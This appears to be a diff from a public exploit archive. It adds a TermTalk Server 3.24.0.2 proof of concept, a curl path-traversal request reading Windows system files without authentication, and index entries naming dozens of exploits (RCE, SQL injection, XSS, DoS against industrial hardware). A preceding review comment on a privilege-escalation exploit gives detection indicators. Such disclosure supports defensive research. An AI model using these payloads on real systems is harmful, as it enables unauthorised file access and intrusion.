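Review bot: The inner `for (($i = 0); $i -lt 100; $i++)` reuses `$i`, the counter of the enclosing 500-iteration loop, and resets it; this is only harmless because the block ends in `exit`, and a distinct name such as `$j` would make that explicit instead of relying on the early exit. `throw $_.Exception.Message` rethrows a bare string and discards the original exception object and its stack; a plain `throw` inside the `catch` preserves it. From a defender's perspective the visible indicators are concrete: `Get-ChildItem`/`Set-Content` against `\ProgramData\amagent\execDir*\*.ps1` and a `-replace "#endregion"` rewrite of a script the agent is about to run, so monitoring writes to that directory by non-agent processes is the detection point until the vendor fix referenced in the `# Writeup` line is deployed.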
@@ -0,0 +1,12 @@
+# Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
+# Date: 03/01/2022
+# Exploit Author: Fabiano Golluscio @ Swascan
+# Vendor Homepage: https://www.solari.it/it/
+# Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/
+# Version: 3.24.0.2
+# Fixed Version: 3.26.1.7
+# Reference: https://www.swascan.com/solari-di-udine/
+
+POC
+
+curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b35b3da60..78db1d768 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6808,6 +6808,7 @@ id,file,description,date,author,type,platform,port
 50516,exploits/windows/dos/50516.py,"Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
 50535,exploits/windows/dos/50535.py,"Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
 50536,exploits/windows/dos/50536.py,"Modbus Slave 7.3.1 - Buffer Overflow (DoS)",1970-01-01,"Yehia Elghaly",dos,windows,
+50613,exploits/hardware/dos/50613.py,"Siemens S7 Layer 2 - Denial of Service (DoS)",1970-01-01,RoseSecurity,dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@@ -11426,6 +11427,8 @@ id,file,description,date,author,type,platform,port
 50574,exploits/windows/local/50574.txt,"MTPutty 1.0.1.21 - SSH Password Disclosure",1970-01-01,"Sedat Ozdemir",local,windows,
 50591,exploits/macos/local/50591.py,"Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)",1970-01-01,leonjza,local,macos,
 50598,exploits/windows/local/50598.txt,"Microsoft Internet Explorer / ActiveX Control - Security Bypass",1970-01-01,hyp3rlinx,local,windows,
+50633,exploits/windows/local/50633.txt,"TRIGONE Remote System Monitor 3.61 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows,
+50642,exploits/windows/local/50642.ps1,"Automox Agent 32 - Local Privilege Escalation",1970-01-01,"Greg Foss",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18584,6 +18587,12 @@ id,file,description,date,author,type,platform,port
 50590,exploits/java/remote/50590.py,"Apache Log4j2 2.14.1 - Information Disclosure",1970-01-01,leonjza,remote,java,
 50592,exploits/java/remote/50592.py,"Apache Log4j 2 - Remote Code Execution (RCE)",1970-01-01,kozmer,remote,java,
 50599,exploits/windows/remote/50599.txt,"Oliver Library Server v5 - Arbitrary File Download",1970-01-01,"Mandeep Singh",remote,windows,
+50618,exploits/multiple/remote/50618.py,"ConnectWise Control 19.2.24707 - Username Enumeration",1970-01-01,"Luca Cuzzolin",remote,multiple,
+50620,exploits/hardware/remote/50620.py,"Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)",1970-01-01,"Yehia Elghaly",remote,hardware,
+50629,exploits/android/remote/50629.py,"AWebServer GhostBuilding 18 - Denial of Service (DoS)",1970-01-01,"Andres Ramos",remote,android,
+50638,exploits/windows/remote/50638.txt,"TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Fabiano Golluscio",remote,windows,
+50639,exploits/hardware/remote/50639.txt,"Dixell XWEB 500 - Arbitrary File Write",1970-01-01,"Roberto Palamaro",remote,hardware,
+50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",remote,python,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44691,3 +44700,26 @@ id,file,description,date,author,type,platform,port
 50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",1970-01-01,citril,webapps,php,
 50610,exploits/php/webapps/50610.py,"phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
 50611,exploits/php/webapps/50611.txt,"Exponent CMS 2.6 - Multiple Vulnerabilities",1970-01-01,heinjame,webapps,php,
+50612,exploits/php/webapps/50612.txt,"CMSimple 5.4 - Cross Site Scripting (XSS)",1970-01-01,heinjame,webapps,php,
+50614,exploits/php/webapps/50614.txt,"RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)",1970-01-01,faisalfs10x,webapps,php,
+50615,exploits/php/webapps/50615.txt,"RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)",1970-01-01,faisalfs10x,webapps,php,
+50616,exploits/php/webapps/50616.txt,"RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,faisalfs10x,webapps,php,
+50617,exploits/php/webapps/50617.txt,"WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Gaetano Perrone",webapps,php,
+50619,exploits/php/webapps/50619.py,"WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection",1970-01-01,"Ron Jost",webapps,php,
+50621,exploits/php/webapps/50621.py,"Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
+50622,exploits/php/webapps/50622.py,"Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
+50623,exploits/php/webapps/50623.py,"Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Jeremiasz Pluta",webapps,php,
+50624,exploits/php/webapps/50624.py,"WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Liad Levy",webapps,php,
+50625,exploits/php/webapps/50625.txt,"Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Akash Patil",webapps,php,
+50626,exploits/php/webapps/50626.txt,"SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)",1970-01-01,"Momen Eldawakhly",webapps,php,
+50627,exploits/php/webapps/50627.txt,"Nettmp NNT 5.1 - SQLi Authentication Bypass",1970-01-01,"Momen Eldawakhly",webapps,php,
+50628,exploits/php/webapps/50628.txt,"Hostel Management System 2.1 - Cross Site Scripting (XSS)",1970-01-01,"Chinmay Divekar",webapps,php,
+50630,exploits/php/webapps/50630.txt,"Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)",1970-01-01,twseptian,webapps,php,
+50632,exploits/multiple/webapps/50632.txt,"BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)",1970-01-01,Malcrove,webapps,multiple,
+50631,exploits/php/webapps/50631.txt,"Hospitals Patient Records Management System 1.0 - Account TakeOver",1970-01-01,twseptian,webapps,php,
+50634,exploits/php/webapps/50634.txt,"Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection",1970-01-01,"Milad karimi",webapps,php,
+50635,exploits/php/webapps/50635.py,"Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,n0tme,webapps,php,
+50636,exploits/hardware/webapps/50636.py,"Vodafone H-500-s 3.5.10 - WiFi Password Disclosure",1970-01-01,"Daniel Monzón",webapps,hardware,
+50637,exploits/php/webapps/50637.txt,"openSIS Student Information System 8.0 - 'multiple' SQL Injection",1970-01-01,securityforeveryone.com,webapps,php,
+50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",1970-01-01,"Oscar Gil Gutierrez",webapps,php,
+50643,exploits/php/webapps/50643.txt,"WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Andrea Bocchetti",webapps,php,